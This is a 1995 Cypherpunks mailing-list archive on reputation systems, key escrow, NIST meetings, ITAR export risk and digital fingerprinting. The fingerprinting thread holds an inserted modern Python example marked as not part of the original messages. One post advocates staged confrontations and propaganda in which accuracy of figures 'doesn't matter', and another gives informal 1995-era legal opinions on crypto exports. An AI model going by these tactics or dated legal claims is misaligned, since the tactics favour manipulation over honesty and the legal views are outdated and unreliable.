patriotic government agents believe they currently have the right 
and the responsibility to monitor the civilians' possibly-illegal 
activities.  Your hypothetical review board of cypherpunks would 
unacceptably limit their established right to gather evidence and
intelligence.  Investigations too sensitive to mention here, would
be crippled.  Unless of course, you intended that "or by other lawful
authority" would be included in your scheme?

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: Lou Poppler <lwp@mail.msen.com> | "Understanding is a three-edged      ::
::    http://www.msen.com/~lwp/    | sword..."-- Ambassador Kosh, Babylon5::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Mon, 11 Sep 95 09:53:47 PDT
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: Progress and Freedom Conference this Summer
In-Reply-To: <v02120d06ac79f1eb4cbd@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.950911094646.9226B-100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Sep 1995, Robert Hettinga wrote:
> 
> I just saw this thing on CSPAN, and I thought it was way cool. Here's how
> to get it from CSPAN in case they don't run it again.
> 
> Cheers,
> Bob Hettinga

During the program, which was *very* interesting, it was announced by
CSPAN that they would carry the remainder of the meeting next Sunday
Sept. 17.  Check w/them for the time locally.

Chuck Lewton
Redmond, WA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 11 Sep 95 09:44:42 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: question about reputation
Message-ID: <ac79b3f9090210046cde@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


How reputation systems work is an important issue. I hope we can discuss it
further.

At 10:32 PM 9/10/95, Wei Dai wrote:

>In an economy based on positive reputations, how does one acquire a
>reputation capital?  One way may be to initially perform services at a
>price below cost, but this has some problems.
>
>For example, Alice starts an anonymous consulting service, and announces
>that she will answer the first ten queries for free.  Upon hearing this,
>Mallet immediately starts another consulting service, and announces the
>same offer.  At this point Mallet can simply forward his customers'
>queries to Alice and Alice's answers back to his customers.  Thus, he gains
>reputation at no cost.
>
>On the other hand, this "man-in-the-middle" attack can also work against
>conventional True Name based services, but perhaps with less effect.  Has
>anyone ever heard of this being done?

This line of reasoning is a variant of the "Chess Grandmaster" scheme,
wherein one gains the reputation of a chess grandmaster by echoing the
moves of a chess grandmaster playing in another game. I believe this is
described in various crypto books, but I haven't looked it up here.

In practice, nothing so simple as an "Ask any 10 questions" would be a
practical way to gain reputation. If Alice is trying to build up a rep,
she'll choose her customers with some care, or make sure that alternate
channels also exist.

>Is there a better way to acquire a good reputation?

Directly contacting a larger group, such as this list, is usually a faster
and better way to build a reputation than in, say, answering only questions
directly made. Admittedly, many consulting cases involve direct contacts.

However, the reputation of a Pr0duct Cypher, or a Black Unicorn, or a Tim
May, or a Wei Dai, is usually made in a public forum, not primarily in
one-on-one contacts. While not all of us sign our posts, the principle is
roughly the same: we are communicating directly, so man-in-the-middle
attacks, or "Chess Grandmaster" attacks, are fairly ineffective.

And practically speaking, if someone hires _me_ as a consultant, it is
probably based on past achievements, through multiple channels. This would
apply to digital pseudonyms as well, though not as directly.

(Humorous Sidenote: an informal variant of the Chess Grandmaster approach
is to use the best arguments found on one list on _another_ list. Another
variant, widely used, is to adopt the best arguments of others and use them
one's self (oneself?). This is how memes spread, and is central to the
advancement of knowledge.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 11 Sep 95 07:12:59 PDT
To: www-buyinfo@allegra.att.com
Subject: e$: Progress and Freedom Conference this Summer
Message-ID: <v02120d06ac79f1eb4cbd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


There was a pointer here to an article in the NYT or WSJ about the
conference this summer of the Progress and Freedom Foundation, with muchos
net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth,
etc.) in attendance. Topics were mostly about e$ and the
causes/consequences thereof.

I just saw this thing on CSPAN, and I thought it was way cool. Here's how
to get it from CSPAN in case they don't run it again.

Ask for Tape number 57759-63
CSPAN prices their tapes by the hour, at $35/hr. This tape is $105.00


CSPAN
Department 53
Washington, DC 20055

In case I botched something above, or you want to put this on your favorite
book-entry transaction account ;-), CSPAN's phone number is 202-737-3220
and ask for Viewer's Services.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Mon, 11 Sep 95 07:13:08 PDT
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: question about reputation
Message-ID: <9509111414.AA29512@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 03:32 PM 9/10/95 -0700, Wei Dai wrote:

>For example, Alice starts an anonymous consulting service, and announces 
>that she will answer the first ten queries for free.  Upon hearing this, 
>Mallet immediately starts another consulting service, and announces the 
>same offer.  At this point Mallet can simply forward his customers' 
>queries to Alice and Alice's answers back to his customers.  Thus, he gains 
>reputation at no cost.

        As a response to this example.  I'd argue Mallet has less of a
reputation because:
        (1) if this example applies to the first 10 questions from each
person, Alice will answer many more questions than Mallet.  (Mallet answers
10 and is done.)
        (2) if this example means the first 10 questions from anywhere,
Mallet then has to arrange to have his customers' 10 questions in the queue
and ready to go before any other person can get in the queue, which is some
work.
        
        In general, I'd think reputation is akin to brand name to a degree.
Differentiation!  So, if Alice notices people tracking her "reputation
advertising" she can change it.  Reputation might not be as static a concept
as we think (as others have mentioned by bringing up arbitrage.)

-------------------------
Regards,                   
Joseph M. Reagle Jr.     http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu           0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 11 Sep 95 07:42:06 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Clinton's Black Helicopters Over My House!
In-Reply-To: <ac6fd3aa0202100430a8@[205.199.118.202]>
Message-ID: <m0ssAWm-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> ObConspiracy content: high.
> 
> They are coming to take me away, take me away!
> 
> Clinton's black helicopters are swooping low over my house.
> 
> What should I do?

...
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."

About a month ago I walked by California Pizza Kitchen just south
of Dupont circle and Clinton was there eating with his family in a 
full restaurant...

Too bad I didn't have my RSA T-shirt yet... BTW, I sent money ages ago.

My 'Cypherpunk Criminal' shirt is just about worn out.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 11 Sep 95 09:58:16 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on GAK
Message-ID: <199509111516.LAA11450@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>   "If this fails," said a figure familiar with the
>   Administration's thinking on the proposed change in
>   cryptographic policy, "it's going to lead to a very
>   divisive debate. And the irony, for libertarians who oppose
>   key escrow, is that if it fails, I am convinced that Louis
>   Freeh cannot be true to his job without proposing domestic
>   controls on data encryption."
>
>   "He's not going to give up without a fight, and neither is
>   the Justice Department," said the figure, who spoke on the
>   condition he not be identified.

It worked during WWII but will it work now?  After all, locking up Japanese
Americans worked during WWII, but would not work now.

Note that the NSA abandoned their "born secret" stance on cryptographic
technology when it became impossible to sustain.  And when R, S, & A
together with MIT decided to publish "A Proposal for a Public Key Encryption
System" in spite of NSA threats, the Agency folded.  That represented a
genuine surrender.

We'll see if Louis has more balls than the NSA did.  Widespread resistance
is likely.  Court tests will be entertaining.

At this point in the discussion, someone always pipes up and says that even
if cypherpunks fail to obey a crypto ban, businesses will fall into line
like the good sheep they are.  This prediction ignores some important facts
about modern businesses.  First, many small businesses already routinely
ignore government mandates in hiring, the use of independent contractors,
environmental regulation, and taxation.  These entities can be counted upon
to resist crypto controls as well (if they feel like using crypto).  Second,
a growing number of businesses are headed by explicit libertarians or right
wing nuts.  These people have already engaged in a lot of resistance to
crypto regulation and can be counted on for more resistance.  Additionally,
if strong crypto confers a competitive advantage on users, use will be
encouraged.

Does anyone have a handle on exactly how a crypto ban would be carried out?
Would regulation (if so, which ones) or legislation be used?  The exact
details will make a big difference in considering avoidance strategies. 

DCF

"Blatant Advertisement --- If anyone needs someone to string 'words in a
line' for them, my services are available."


 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Sep 95 09:13:23 PDT
To: cypherpunks@toad.com
Subject: VER_tgo
Message-ID: <199509111613.MAA02185@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-11-95. W$Japer:


   "VeriFone Expected to Announce System For Purchasing Goods
   on the Internet."

      VeriFone, Inc., which manufactures terminals through
      which merchants scan consumers' credit cards for
      authorization, said it will provide merchants who wish
      to market goods on the global computer network with a
      complete set of tools to handle electronic cash,
      electronic checks and credit-card payments. The system
      consists of four different products: A consumer would
      use the software equivalent of a wallet, which could
      include different forms of payment, such as electronic
      checks, cash, or credit cards to purchase goods. The
      consumer would also use a smartcard inserted in a device
      connected to a PC to verify his identity. The card would
      also contain other cardholder information and eventually
      could include electronic cash.


   Philips and Oracle Plan Electronic Mail Without Use of PCs

      Philips Electronics NV and Oracle Corp. plan to offer
      electronic mail without personal computers, using
      Philips phones that have small display screens and
      keyboards. Gerrit Schipper, president of Philips Home
      Services, said the new e-mail service was designed to
      increase the services' value and appeal to the 70% of
      U.S. households that don't have PCs.


   2 go: VER_tgo (5 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 11 Sep 95 12:36:58 PDT
To: cypherpunks@toad.com
Subject: Re: question about reputation
Message-ID: <v02130501ac7a4c166b62@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


Actually about a year ago I was working on a project to help merge
electronic tokens and 'reputation'. The idea was to reinforce contributions
to the net and acknowledge them in a tangible manner. The classic
method of gauging respect has become more difficult as the growth of the net
has resulted in a surfeit of citizens who simply haven't learned the idea
of contribution and net community, nor how to judge the level of respect
that others have.

We'd seed a certain # of tokens amongst FAQ maintainers, moderators, and
those who are active in helping on lists and forums. A group would be
chosen to help decide how to split up the seed tokens. This group would not
be eligible for any tokens themselves (they'd be selected from those we
felt were the most active, oddly they'd be earning old style respect, that
is contributing their time in distributing tokens without being able to
earn any.)

Still under discussion was how to bring more tokens into the system. One
was to continue to distribute tokens based on a standard for certain
actions and further nominations as judged by the council (which would
change membership itself over time.) The second was to have an actual
foundation set up to accept contributions to be distributed to other net
related non-profits. Thus for those who don't have the time or knowledge
base to contribute to the net, they can actually contribute money to aid
net-related groups.

The tokens could be exchanged when people answer questions, as favors. Part
of the money from the foundation would be to have gatherings which would
'cost' tokens, so those who have put in their time and labor could mix and
listen to speakers, enjoy a nice dinner, etc.

Anyway, just interesting to see the topic come up now in the Cypherpunk
community. At the time, there were still some barriers between the
objectives we were given by different people paying our own checks on the
matter.
Perhaps the idea of 'Friends of the Net' is now more pertinent.

Feel free to drop me some email or cc back to the list. If enough people
are interested, I'll look into the subject again.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 11 Sep 95 13:15:16 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re:  Digital Fingerprinting
Message-ID: <v02120d0cac7a3111ef30@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
>I'm not sure how to do it for software, but for novels it should be easy
>to fingerprint.  Every couple of pages the author writes a sentence twice
>in different forms.  This would not take a great deal of extra effort on
>the part of the author.  Software can then choose from the alternative
>variations in different patterns to produce a unique fingerprint for
>every copy.
>

One of the points that I'm exploring is "what kind of transformation
makes for an un-fuzzable fingerprint bit." This example seems to fall
into the same bin as the "two cameras" approach; the two sentences come
out of the author's head in the same way that the two cameras are pointed
at the same piece of reality.

>There would seem to be two approaches to removing the fingerprint.
>One would be re-writing every sentence in the novel.  The other would be
>to collect enough copies to identify all of the sentences which have
>variations.  Most of the mathematics of fingerprinting research is
>oriented around figuring out how many different points of variation there
>must be to be secure against a certain number of copies of the
>fingerprinted item being compared.

Right. All of these approaches, however, assume unforgeable bits, either
by obscurity of insertion, or by means that are analogous to the "two
cameras" approach. I'm trying to come up with a robust definition of
"two cameras-ness", any suggestions appreciated.
>
>Perhaps a similar approach could be applied to software, where in many
>cases a couple of statements could be trivially interchanged, or other
>kinds of simple transformations could be manually generated.  Those
>could be marked by the programmers without too much extra work.
>

The problem with changes like this is that if they're trivial enough
not to require retesting, etc., then once hackers know the accepted
range of modification, they can completely fuzz them up. Various
other schemes such as reordering object modules fall into this as
well. The problem with software is that it can be reverse-compiled,
then compiled again. Unless you're willing to define a series of branches
that really do different things (and are not so trivial to be
expressed as algorithmic variants), then bits can be fuzzed. If you
_do_ write these branches, you are in for a rough time when it comes
time to do quality assurance on your software.
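
Added example (not part of the original messages): a Python sketch of the variant-sentence fingerprint Hal Finney describes, with a tracer that still ranks the source copies first after sentences are rewritten or two copies are compared and mixed. The constructed sentence pairs, the HMAC-derived codewords, the demo key and every function name are assumptions made for illustration.

```python
import hashlib
import hmac
import random

# Assumption: a publisher-held secret that makes each copy's codeword unpredictable.
SECRET = b"constructed-demo-key"


def make_points(n):
    """Constructed manuscript: n variation points, each a sentence written two ways."""
    return [(f"Sentence {i}, first wording.", f"Sentence {i}, second wording.")
            for i in range(n)]


def codeword(copy_id, n):
    """Pseudo-random n-bit codeword for one copy, derived with HMAC-SHA256."""
    bits, counter = [], 0
    while len(bits) < n:
        msg = f"{copy_id}:{counter}".encode()
        for byte in hmac.new(SECRET, msg, hashlib.sha256).digest():
            bits.extend((byte >> k) & 1 for k in range(8))
        counter += 1
    return bits[:n]


def embed(points, copy_id):
    """Build one copy: bit i of the codeword picks the wording at point i."""
    return [pair[bit] for pair, bit in zip(points, codeword(copy_id, len(points)))]


def read_marks(points, copy):
    """Recover the bits; None marks a sentence that matches neither wording."""
    return [pair.index(s) if s in pair else None for pair, s in zip(points, copy)]


def exposed_positions(copies):
    """Points where the compared copies differ; the rest stay hidden from them."""
    return [i for i in range(len(copies[0])) if len({c[i] for c in copies}) > 1]


def mix(copies, rng):
    """Model a copy assembled from several: each sentence comes from one of them."""
    return [rng.choice(copies)[i] for i in range(len(copies[0]))]


def trace(points, leaked, issued_ids):
    """Rank issued copies by how many readable marks agree with the leaked text."""
    marks = read_marks(points, leaked)
    scores = []
    for cid in issued_ids:
        cw = codeword(cid, len(points))
        # A rewritten sentence reads as None and simply contributes no evidence.
        scores.append((cid, sum(1 for m, b in zip(marks, cw) if m == b)))
    return sorted(scores, key=lambda item: -item[1])


if __name__ == "__main__":
    points = make_points(256)
    a, b = embed(points, 7), embed(points, 23)
    print("exposed to two holders:", len(exposed_positions([a, b])), "of", len(points))
    print("top suspects:", trace(points, mix([a, b], random.Random(1)), range(50))[:3])
```

With random codewords, two holders see only about half of the variation points, which is why the number of points has to grow with the number of copies that may be compared.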









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 11 Sep 95 10:13:49 PDT
To: jya@pipeline.com (John Young)
Subject: Re: NYT on GAK
In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com>
Message-ID: <199509111713.NAA06281@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	It's a good thing the administration only wants to outlaw
cryptography, not anonymity.

Adam


|    The New York Times, September 11, 1995, p. D7.
| 
| 
|    Technology / Peter H. Lewis
[...]
|    "If this fails," said a figure familiar with the
|    Administration's thinking on the proposed change in
|    cryptographic policy, "it's going to lead to a very
|    divisive debate. And the irony, for libertarians who oppose
|    key escrow, is that if it fails, I am convinced that Louis
|    Freeh cannot be true to his job without proposing domestic
|    controls on data encryption."
| 
|    "He's not going to give up without a fight, and neither is
|    the Justice Department," said the figure, who spoke on the
|    condition he not be identified.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Sep 95 11:22:01 PDT
To: pfarrell@netcom.com
Subject: NIST Hat Tricks
Message-ID: <199509111719.NAA08676@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat,


A response to the quote below from your NIST Key Escrow web 
site:


I got the full Discussion Paper #4 with all ten criteria from 
the main desk, along with others that seemed to be appearing as 
the day passed. (I'll fax copies of any of the handouts to 
anyone wanting hardcopy. We scanned all handouts.)


In breakout session B-2, we were also given only that part of 
Paper #4 that dealt with our session's criteria 3, 4 and 9. It 
was passed out at the end of the meeting after discussion had 
ceased. We did not get a chance to discuss the "example 
potential solutions."


Strange procedure: it seemed as if NIST was sleight-of-handing 
prepared backup papers as if they anticipated resistance. Maybe 
there would have been more concessions or more rabbits pulled 
from the KE hat if there had been even louder "brrrrat-GAK."


Never too late to ask for those other trapped bunnies.


----------

[Excerpt from Pat's web site]:

     * During the first breakout session, in the technical discussion of
       criteria # 5 and #6, an authorless (presumably government issued)
       "Example Potential Solutions" paper was distributed. It caused a
       lot of grumbling amongst the attendees, as they were supposed to
       discuss it, without any prior chance to read or react to it. Here
       are two versions of it, First, Anonymous Sample Solutions (HTML by
       PDF) and a simple ASCII version Sample Solutions (ASCII text by
       John Young)

       I have not seen an electronic version of the paper that I
       received. It contains the following paragraph:

       "Example Solutions to export criteria 5 and 6 are identified
       below to help give a better feel for approaches that implementors
       may take to satisfy the criteria. The information in this paper is
       not intended to represent fail-safe, cookie cutter solutions to the
       criteria, but only to generate more detailed discussions."

       It is also interesting to note that John Young has an electronic
       document with all of the sample solutions (a solution for each of
       the ten criteria). I never saw a paper document with all ten
       solutions. The one that was handed to me had only two criteria, #5
       and #6. I talked to attendees of other breakouts, and they had
       received nothing.
       





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 11 Sep 95 13:39:37 PDT
To: cypherpunks@toad.com
Subject: crypto confrontation
Message-ID: <199509112036.NAA10670@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


regarding the NIST policies on cryptography being shaped at this
moment, an idea occurred to me.

one of the most important aspects of protest is getting the public
to be on your side. right now the american public is pretty indifferent
about the cryptography issue, but there could be some very graphic
situations that would help bring it out into the limelight even
more than it is at the moment, and make anyone promoting government 
key escrow seem like the bad guys.

the minor protest going on with the Perl t-shirts is really fantastic
(last count, ~700 shirts out the door), but what really brings an
issue to the forefront of american consciousness (i.e. the media)
is *confrontation*.

picketers in front of buildings clashing with police is almost 
guaranteed to get a little media coverage, almost no matter what
the issue.

now, some day we might reach this point with crypto rights. it would
be quite a spectacle. (I'm sure people would argue against it here,
but IMHO even a simple demonstration of a few dozen people might
do more for widespread public consciousness of the issue than a
million lines of code on an FTP site..)

--

in the meantime here's another possibility:

suppose that a software company intentionally set up a situation where
they are exporting a cryptographic algorithm out of the country. and
they have filming crews on hand when the bad-guy customs agents or
whoever stop the truck at the border and confiscate the software. have the 
reporters asking questions like "why are you confiscating this"? "answer: this
is classified a munition". 

this could really be a fantastic segment for Hard Copy or any of the
other trashy tabloid shows. just a confrontation for confrontation's
sake, with nothing resolved, just a lot of people pissed off at each
other, and the end result the viewer coming away saying, "what a disgrace!!
somebody should do something!!"

I mean, imagine a segment where you see the customs officers pointing
guns at a truck driver or whatever (that would *really* be optimal), and
them breaking into the truck to pull out the software. the reporter
could say, "what's so deadly that's in the box??" and pull out a computer
disk. 

sound bites of people outside the country saying how they want to use
the crypto. a nice businessman in a tie, in the middle of an office
with hardworking suits and ties.
"we're not criminals!! we're trying to *protect* ourselves
from criminals!! but your government won't let us!!"  other sound bites:
joe sixpack goes and buys crypto package from Germany because he doesn't
have to put up with illegality and uncle sam. shots of massive Microsoft
and an executive or programmer complaining 
how they can't put the code they want to in their programs, that
users *want*, that would solve these horrible hacker problems that the
country is having,  because uncle sam is interfering.

other scenes: businessmen calculating how much the U.S. software market
(which, BTW, we are premier in the world in) has already lost in
sales, or could potentially lose on the information highway. "my
company personally had [x] ready but could not release it. [y] was
delayed [z] years for approval. we estimate we have lost [a] and
have had to hold off hiring as much as [b] people". (the actual numbers
should be as close to reality as possible, but from a PR point of view
don't even matter!!)

much made of how the Internet committees are now ignoring the US 
recommendations that require escrowed crypto. "the U.S. may ironically become 
only an inconsequential rest stop on the information superhighway of the future"
much FUD about how the US could become a "backwater in cyberspace" 
because of these policies. etc!!  lots of hype about how cyberspace
will become the very basis of future global economies, and that anybody
who opts out will be slitting their own throat. also, crypto being absolutely
essential to secure transactions.

in fact, if we play this right we could even get a new kind of 
semi-conventional wisdom into that easily-manipulated thing called
the public consciousness: "hackers can be foiled by good crypto.
the government is killing good crypto. therefore hackers are proliferating
because of the government!!"

plus, you could throw in the Phil Zimmermann thing too, although that
might be overdoing it. as for all the bill of rights angle and those
kinds of things, those could be put in there, but remember that people
generally hate lawyers <g>

--

actually, I'm actually rooting for PRZ to be indicted. an acquittal would
be extremely costly, but it could really bring the key issues to the 
forefront of the american or even world consciousness. hell, it would
beat the OJ trial any day in my book!! and in fact it might be just
the ticket to the kind of mainstream journalism that could really
tip the balance of public opinion. (the press is pretty sleazy, I 
admit, but it is a *monster* machine that one might be able to
trick into working for you!! in fact, I would consider that quite the
ultimate hack in social engineering!! any weenie hacker can con a
phone repairman, but can you trick the whole U.S. media system into
telling the public what you want it to hear? sounds like a real 
challenge to me!!)

and BTW, I am aware of how DJBernstein and others have various lawsuits
and FOIAs against the government. but I don't think these are really
penetrating Joe Sixpack's brain, when that is really where the battle
lies. and Joe Sixpack doesn't understand esoteric things like the
bill of rights, the constitution etc.-- but he does understand pictures
of police confronting someone who doesn't seem to be doing anything wrong 
and is arguing in favor of something good for america.

you might think, "what does public opinion have to do with government?"
answer: a lot. if in a public poll, a large majority were in favor of
releasing crypto regulation, you can bet that the "which way is the
wind blowing NOW?!?!?!" politicians (that is, all of them, <g>)
would be scrambling to appease the public. even Clinton has a long
record of merely going with what is politically expedient. I can fully
imagine him defying key law-enforcement agencies if the public was
more in support of good crypto.

and, if we can get scenes like what I'm talking about, that day may
become a reality. I continue to believe that the way to really hammer
the issue and get what we want may amount to a kind of "psychological
terrorism": "propaganda" on television that promotes our cause to joe
sixpack, and simply honestly tells what is at stake. (that's the 
beauty of our position, is that even the simple truth is very powerful
propaganda-- in fact that's how you can generally tell if you are on
a side that is likely to win in the long run!!).

there are many here who will argue for less confrontational approaches,
about not getting anyone upset, about not trying to paint anyone as
a bad guy, about just opting out of a "hopeless" political process, about how
the whole US system is so screwed up anyway that we're all pretty
much screwed when it comes down to it, etc. ad nauseam, ...

but IMHO a pound of nonconfrontation is worth a feather of confrontation
in the long run. and I continue to believe the confrontation, while
a bit messy and unpleasant at times, will really get the ultimate result
that we want: (1) widespread public consciousness on the issue, 
(2) widespread support of our side.

again, the code distribution is great, but in the long term, I continue
to believe that public opinion is ultimately what runs a government,
and a tyrannical government cannot exist without the tacit support of
the population. 

I applaud the Perl t-shirt sellers for their great victory but suggest
that greater victories lie in waiting. how about a demonstration of
a bunch of people wearing the shirts, for starters?


--Vlad Nuri






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Mon, 11 Sep 95 13:54:22 PDT
To: cypherpunks@toad.com
Subject: More NIST presentations available
Message-ID: <199509112050.NAA11447@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've collected more presentations and comments for last week's NIST GAK
meeting. I've got CDT's presentation and new policy response, VTW's 
presentation, and David Lesher's post from talk.politics.crypto.

http://www.isse.gmu.edu/~pfarrell/nistmeeting.html
is the starting point.

If you see more, please forward it to me. Thanks
Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Sep 95 14:49:31 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: question about reputation
Message-ID: <199509112148.OAA08494@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 AM 9/11/95 -0700, Tim wrote:
>(Humorous Sidenote: an informal variant of the Chess Grandmaster approach
>is to use the best arguments found on one list on _another_ list. Another
>variant, widely used, is to adopt the best arguments of others and use them
>one's self (oneself?). This is how memes spread, and is central to the
>advancement of knowledge.)

John Young uses this approach, quite effectively; his source lists are
the New Yawk Times and Wall Street Journal, and the reputation he's built
by forwarding the material has been quite good, in spite of the dubious
sources of his information :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Sep 95 15:17:43 PDT
To: Todd Ackman <tka@brutus.bright.net>
Subject: Re: itar question
Message-ID: <199509112217.PAA14304@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:08 PM 9/11/95 -0400, you wrote:
>If I create a set of patches to a PD or GNU software package (i.e. telnetd, 
>httpd) to support encryption (in particular SSL), can i put the patches up 
>on an ftp site, Or would i be in violation of itar, and therefore risk 
>getting hauled off by the feds?  (i'm a us citizen living/working in the 
>states).

If you create them in the states, and export them, and they contain crypto,
you can be busted and convicted.

If you put them on an ftp site without preventing or at least discouraging
foreigners from accessing them, you can be busted, but you've at least got 
a potentially interesting court case about freedom of speech and the press,
etc., for which you will need _very_ good lawyers unless either 
a) Phil Zimmermann gets indicted and acquitted first or b) you don't mind
losing. 
If you do b) before Phil gets his day in court (as opposed to his 
months and months of grand jury), you risk creating a precedent that
can help the Bad Guys convict him.

If you create them in the states, and they contain hooks to call crypto,
but don't actually contain the crypto themselves, then there's a question
of whether they are components of a munition or technical data therefor,
or whether they're just code that calls subroutines named "SSL_init()",
"DES()", "RSA()", etc., which is behavior that's at least been threatened
with FUD, but may be defendable in court.  Your case is definitely stronger
if your code is public domain (by the ITAR definitions, which are rather
different than the copyright-related definitions), and of course if it's part
of a working system of purely non-munitions code that just happens to have
routines like "Do_Everything_Slowly()", "Reliability_Supporting_Algorithm()", and
"SUPDUP_Simulation_Library" -- might even be fun to write a library like that,
though I suppose certain companies might be upset if you called your
Really_Special_Arithmetic library RSAREF :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@rand.org (Jim@rand.org)
Date: Wed, 20 Sep 95 17:18:24 PDT
To: cypherpunks@toad.com
Subject: Clipper: the definitive meme
Message-ID: <9509201550146386@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 11 Sep 95 08:26:42 PDT
From: Jim Gillogly <jim@rand.org>


T-shirt!!  T-shirt!!

        Jim Gillogly
        Trewesday, 20 Halimath S.R. 1995, 15:26

------- Forwarded Message

From: wtshaw@aol.com (WTShaw)
Newsgroups: talk.politics.crypto
Subject: Re: Impressions of the NIST meeting
Date: 11 Sep 1995 04:50:27 -0400

In the world of Jet-Age crypto, the government offers up a biplane, and
seeks to reserve the second seat for themselves.

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 11 Sep 95 06:40:40 PDT
To: cypherpunks@toad.com
Subject: Comp Sec Calendar
